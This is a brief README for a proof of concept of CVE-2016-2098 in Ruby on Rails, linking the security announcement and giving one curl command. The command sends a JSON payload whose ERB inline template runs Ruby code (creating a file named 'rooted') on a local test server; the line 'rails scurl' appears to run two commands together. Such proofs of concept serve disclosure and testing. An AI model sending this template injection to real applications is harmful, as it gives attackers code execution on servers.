
Proof of concept showing how CVE-2016-2098 leads to remote code execution
== README Proof of concept for https://groups.google.com/forum/#!topic/rubyonrails-security/ly-IH-fxr_Q
== Exploiting:
rails scurl -v -H "Accept: application/json" -H "Content-type: application/json" -X GET -d ' {"id" : { "inline" : "<%= FileUtils.touch \"rooted\"%>"}}' http://localhost:3000/exploits